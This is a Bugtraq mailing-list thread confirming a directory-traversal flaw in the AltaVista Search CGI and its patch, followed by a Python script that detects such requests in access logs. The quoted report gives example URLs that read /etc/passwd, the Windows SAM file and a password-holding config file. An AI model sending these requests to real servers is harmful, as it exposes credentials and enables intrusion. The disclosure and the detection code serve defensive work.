Bugtraq: Re: Altavista followup

Re: Altavista followup

From: Roelandts, Guy <Guy.Roelandts_at_COMPAQ.COM>
Date: Tue, 11 Jan 2000 07:54:38 -0000

Hi Rudi,

   Just tried to reproduce the bugs you were talking about, and I can
 confirm that they exist without their secpatch and that they are gone
 after having installed the secpatch.

Guy ROELANDTS
Compaq EMEA

> -----Original Message-----
> From: rudi carell [mailto:rudicarell_at_HOTMAIL.COM]
> Sent: Sunday, January 09, 2000 4:37 PM
> To: BUGTRAQ_at_SECURITYFOCUS.COM
> Subject: Altavista followup
>
>
> hola,
>
> more bugs in the AV-Search thing ..
>
> using uri-encoded strings it is possible to view "any" file
> on the system ..
>
> examples:
>
> unixxxsss ...
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
>
> or on a micro$oft IIS ...
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
>
> interesting infos about the file structure ...
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
>
> or another file which does contain the password ..
>
> http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
>
> altavista told me that this is(was) just a flavour of the "old" bug and its
> fix is(was) included in the last secpatch.
>
> whatever ....
>
> nicedays:-/
>
> RC
> rudicarell_at_hotmail.com
Received on Jan 11 2000
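
A defender-side check for the requests described in this thread, as an added example that is not part of the original posts or of AltaVista's code: it scans access-log lines for `mss` values on `/cgi-bin/query` that, once percent-decoded, climb out of the directory they are resolved against. The log lines, the benign `mss=simple` value and the three-round decode limit are constructed assumptions.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jan/2000:07:50:01 +0000] "GET /cgi-bin/query?mss=simple HTTP/1.0" 200 512',
    '192.0.2.11 - - [11/Jan/2000:07:51:13 +0000] "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd HTTP/1.0" 200 901',
    '192.0.2.12 - - [11/Jan/2000:07:52:40 +0000] "GET /cgi-bin/query?mss=%252e%252e%252findex/intranet/policy.conf HTTP/1.0" 200 377',
    '192.0.2.13 - - [11/Jan/2000:07:53:02 +0000] "GET /cgi-bin/query?q=a%2fb&mss=simple HTTP/1.0" 200 498',
]
MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap double or triple encoding

def fully_decode(value):
    """Percent-decode repeatedly so %252e -> %2e -> '.' is also caught."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def mss_escapes_root(raw_value):
    """True if the decoded value is absolute or resolves above its base dir."""
    path = fully_decode(raw_value).replace("\\", "/")  # treat \ like / (IIS case)
    if path.startswith("/") or path[1:2] == ":":       # absolute path or drive letter
        return True
    norm = posixpath.normpath(path)                     # collapses "a/../b" to "b"
    return norm == ".." or norm.startswith("../")

def suspicious_requests(log_lines):
    """Return request targets whose raw mss parameter escapes the base dir."""
    hits = []
    for line in log_lines:
        try:
            target = line.split('"')[1].split()[1]      # "METHOD target PROTO"
        except IndexError:
            continue                                    # malformed line, skip
        parts = urlsplit(target)
        if not parts.path.endswith("/cgi-bin/query"):
            continue
        for pair in parts.query.split("&"):             # keep the value raw
            name, _, value = pair.partition("=")
            if name == "mss" and mss_escapes_root(value):
                hits.append(target)
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The same `mss_escapes_root` test can sit in front of the CGI as an input filter on hosts where the secpatch has not yet been applied.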
